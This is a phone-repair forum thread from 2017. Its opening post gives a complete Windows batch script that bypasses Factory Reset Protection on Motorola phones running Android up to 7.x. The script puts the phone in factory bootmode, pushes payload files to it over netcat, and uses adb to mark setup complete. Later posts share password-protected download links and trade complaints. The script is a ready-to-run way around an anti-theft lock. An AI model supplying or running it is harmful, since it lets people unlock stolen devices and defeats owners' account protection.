GSM Shop GSM Shop
GSM-Forum  

Welcome to the GSM-Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features.
Only registered members may post questions, contact other members or search our database of over 8 million posts.

Registration is fast, simple and absolutely free so please - Click to REGISTER!

If you have any problems with the registration process or your account login, please contact contact us .

Go Back   GSM-Forum > Product Support Sections > Hard/Software Products (official support) > Infinity-Box

Reply
 
LinkBack Thread Tools Display Modes
Old 11-03-2017, 14:23   #1 (permalink)
No Life Poster
 
rebainoor's Avatar
 
Join Date: Feb 2006
Location: In my LAB
Posts: 2,408
Member: 231728
Status: Offline
Thanks Meter: 1,397
Donate money to this user
Moto Frp Latest Patch All Till 7.x.x.x free ( ADB FASTBOOT Command)


for all users till have problemes with new patch security

you need search busybox.exe in google

Quote:
set TOOLS=%MYFILES%
::set TOOLS=%~dp0
set ADB_EXE=%TOOLS%\adb.exe
set BUSYBOX_EXE=%TOOLS%\busybox.exe
set FASTBOOT_EXE=%TOOLS%\fastboot.exe
set IP=192.168.137.1

GOTO :MAIN

:CHECKIP
ping -n 1 %IP% | find "TTL=" >NUL 2>&1
if errorlevel 1 (
ping 127.0.0.1 -n 5 1>NUL 2>&1
GOTO CHECKIP
)
IF /I "%STEP%"=="1" GOTO FOUNDIP1
IF /I "%STEP%"=="2" GOTO FOUNDIP2
IF /I "%STEP%"=="3" GOTO FOUNDIP3

:CHECKPM
SET pmrunning=N
%ADB_EXE% wait-for-device
FOR /F "tokens=*" %%i in ('%ADB_EXE% shell ps^|FIND /I "android.process.acore"') do SET pmrunning=Y
IF /I "%pmrunning%"=="N" (
ping -n 3 127.0.0.1 >NUL
GOTO :CHECKPM
)
GOTO :FOUNDPM

:MAIN
CLS
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO IMEIGURUS (c) 2017
ECHO Motorola FRPv2 Tool
ECHO by chavonbravo
ECHO.
ECHO (Device should be asking to verify email account)
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ECHO.
ping 127.0.0.1 -n 5 1>NUL 2>&1
cls
ECHO.
ECHO Put Motorola device in fastboot/bootloader mode
%FASTBOOT_EXE% oem config bootmode factory >NUL 2>&1
%FASTBOOT_EXE% reboot >NUL 2>&1
ECHO.
ECHO Waiting for device...
SET STEP=1
GOTO CHECKIP
:FOUNDIP1
ECHO.
ECHO Found!
ECHO.
ECHO Sending payload and rebooting
%BUSYBOX_EXE% cat %TOOLS%\1 | %BUSYBOX_EXE% nc 192.168.137.2:11000 >NUL
%BUSYBOX_EXE% cat %TOOLS%\2 | %BUSYBOX_EXE% nc 192.168.137.2:11000 >NUL
%BUSYBOX_EXE% cat %TOOLS%\3 | %BUSYBOX_EXE% nc 192.168.137.2:11000 >NUL
ping 127.0.0.1 -n 5 1>NUL 2>&1
ECHO.
ECHO Waiting for device...
SET STEP=2
GOTO CHECKIP
:FOUNDIP2
ECHO.
ECHO Found!
ECHO.
ECHO Sending payload
%BUSYBOX_EXE% cat %TOOLS%\4 | %BUSYBOX_EXE% nc 192.168.137.2:11000 >NUL
ping 127.0.0.1 -n 2 1>NUL 2>&1
ECHO.
ECHO Waiting for device...
SET STEP=3
GOTO CHECKIP
:FOUNDIP3
ECHO.
ECHO Found!
ECHO.
ECHO Sending payload and rebooting
%BUSYBOX_EXE% cat %TOOLS%\5 | %BUSYBOX_EXE% nc 192.168.137.2:11000 >NUL
%BUSYBOX_EXE% cat %TOOLS%\3 | %BUSYBOX_EXE% nc 192.168.137.2:11000 >NUL
ping 127.0.0.1 -n 5 1>NUL 2>&1
ECHO.
ECHO Waiting for device and Allow USB Debug...
%ADB_EXE% kill-server >NUL 2>&1
%ADB_EXE% wait-for-device >NUL 2>&1
ECHO.
ECHO Found!
ECHO.
ECHO Bypassing FRP...
GOTO CHECKPM
:FOUNDPM
%ADB_EXE% shell settings put secure user_setup_complete 1 >NUL 2>&1
%ADB_EXE% shell sync >NUL 2>&1
ECHO.
ECHO Rebooting to fastboot/bootloader
%ADB_EXE% reboot bootloader >NUL 2>&1
%FASTBOOT_EXE% oem config bootmode "" >NUL 2>&1
%FASTBOOT_EXE% reboot >NUL 2>&1
ECHO.
ECHO DONE!!!
%ADB_EXE% kill-server >NUL 2>&1
ping 127.0.0.1 -n 5 1>NUL 2>&1
  Reply With Quote
The Following 5 Users Say Thank You to rebainoor For This Useful Post:
Show/Hide list of the thanked
Old 11-03-2017, 14:35   #2 (permalink)
No Life Poster
 
JayDi's Avatar
 
Join Date: Mar 2007
Posts: 16,384
Member: 462970
Status: Offline
Thanks Meter: 16,207
I will make update in a hour-two without such things
  Reply With Quote
The Following 12 Users Say Thank You to JayDi For This Useful Post:
Show/Hide list of the thanked
Old 11-03-2017, 14:43   #3 (permalink)
No Life Poster
 
rebainoor's Avatar
 
Join Date: Feb 2006
Location: In my LAB
Posts: 2,408
Member: 231728
Status: Offline
Thanks Meter: 1,397
Donate money to this user
Quote:
Originally Posted by JayDi View Post
I will make update in a hour-two without such things
what things ??????????????
  Reply With Quote
Old 11-03-2017, 16:47   #4 (permalink)
Major Poster
 
Join Date: Oct 2010
Posts: 46
Member: 1431187
Status: Offline
Sonork: n/d
Thanks Meter: 7
hi bro nexus 7.1.1
comando_ oem config bootmode factory
pic...
  Reply With Quote
The Following User Says Thank You to eduard1290 For This Useful Post:
Old 11-03-2017, 16:48   #5 (permalink)
Major Poster
 
Join Date: Oct 2010
Posts: 46
Member: 1431187
Status: Offline
Sonork: n/d
Thanks Meter: 7
  Reply With Quote
Old 11-03-2017, 16:49   #6 (permalink)
Major Poster
 
Join Date: Oct 2010
Posts: 46
Member: 1431187
Status: Offline
Sonork: n/d
Thanks Meter: 7
hi bro nexus 7.1.1
comando_ oem config bootmode factory
pic...https://www.4shared.com/s/fgWCdLx3Bei
  Reply With Quote
Old 11-03-2017, 18:21   #7 (permalink)
No Life Poster
 
Yusuf Lawal's Avatar
 
Join Date: Oct 2011
Location: Nigeria
Posts: 5,473
Member: 1677653
Status: Offline
Thanks Meter: 2,025
Donate money to this user
Quote:
Originally Posted by JayDi View Post
I will make update in a hour-two without such things
JayDi, we are still waiting for the update.....
  Reply With Quote
Old 11-03-2017, 18:35   #8 (permalink)
Major Poster
 
Join Date: Oct 2010
Posts: 46
Member: 1431187
Status: Offline
Sonork: n/d
Thanks Meter: 7
Quote:
Originally Posted by Yusuf Lawal View Post
JayDi, we are still waiting for the update.....
solution final...... https://www.4shared.com/s/fs6hHyRTyei

who takes the pass ..... :-)
  Reply With Quote
The Following 2 Users Say Thank You to eduard1290 For This Useful Post:
Old 11-03-2017, 18:45   #9 (permalink)
No Life Poster
 
turca's Avatar
 
Join Date: Dec 2005
Posts: 3,064
Member: 211017
Status: Offline
Thanks Meter: 264
Quote:
Originally Posted by eduard1290 View Post
solution final...... https://www.4shared.com/s/fs6hHyRTyei

who takes the pass ..... :-)
Have Password? thanks
  Reply With Quote
The Following User Says Thank You to turca For This Useful Post:
Old 11-03-2017, 19:08   #10 (permalink)
Freak Poster
 
Join Date: Feb 2016
Posts: 121
Member: 2527159
Status: Offline
Thanks Meter: 22
Quote:
Originally Posted by eduard1290 View Post
hi bro nexus 7.1.1
comando_ oem config bootmode factory
pic...https://www.4shared.com/s/fgwcdlx3bei
file is password protected. Please give password
  Reply With Quote
Old 11-03-2017, 20:10   #11 (permalink)
No Life Poster
 
rebainoor's Avatar
 
Join Date: Feb 2006
Location: In my LAB
Posts: 2,408
Member: 231728
Status: Offline
Thanks Meter: 1,397
Donate money to this user
Wink

Quote:
Originally Posted by rebainoor View Post
for all users till have problemes with new patch security

you need search busybox.exe in google
All team release update today for motorola with new patch security used this batch or fastboot command bublished here in public only in infinity team
  Reply With Quote
Old 11-03-2017, 22:44   #12 (permalink)
Junior Member
 
Join Date: Nov 2017
Posts: 1
Member: 2774942
Status: Offline
Thanks Meter: 0
Quote:
Originally Posted by eduard1290 View Post
solution final......

who takes the pass ..... :-)
waiting for the password ...
  Reply With Quote
Old 11-03-2017, 22:49   #13 (permalink)
No Life Poster
 
Yusuf Lawal's Avatar
 
Join Date: Oct 2011
Location: Nigeria
Posts: 5,473
Member: 1677653
Status: Offline
Thanks Meter: 2,025
Donate money to this user
Quote:
Originally Posted by rebainoor View Post
All team release update today for motorola with new patch security used this batch or fastboot command bublished here in public only in infinity team
Free moto turbo2 frp bypass one click 1mint July 1 2017
  Reply With Quote
The Following User Says Thank You to Yusuf Lawal For This Useful Post:
Old 11-03-2017, 22:55   #14 (permalink)
Major Poster
 
Join Date: Oct 2010
Posts: 46
Member: 1431187
Status: Offline
Sonork: n/d
Thanks Meter: 7
Quote:
Originally Posted by Yusuf Lawal View Post
https://www.4shared.com/s/fI6aL0vS_ei ready
  Reply With Quote
Old 11-04-2017, 07:14   #15 (permalink)
No Life Poster
 
Kwesi_Roy_GH's Avatar
 
Join Date: May 2016
Location: Madina, Accra, GHANA
Posts: 1,181
Member: 2575234
Status: Offline
Thanks Meter: 1,124
Donate money to this user
Quote:
Originally Posted by JayDi View Post
I will make update in a hour-two without such things
So where is the update, JayDi?
Why make bla bla bla when you cannot do it?
Just do it and stop bragging here.
Next time don't make bla bla bla, just do it.
We all know you can do it but don't say you will do within a given time when you know you are not ready to do it.
The same way you promised to release mtk v2 update and up till now, we have not heard any news.
I have said this advice to my wife and family already.
  Reply With Quote
The Following 3 Users Say Thank You to Kwesi_Roy_GH For This Useful Post:
Show/Hide list of the thanked
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


 



All times are GMT +1. The time now is 01:02.



Powered by Searchlight © 2020 Axivo Inc.
vBulletin Optimisation provided by vB Optimise (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
- GSM Hosting Ltd. - 1999-2017 -
Page generated in 0.40058 seconds with 7 queries

SEO by vBSEO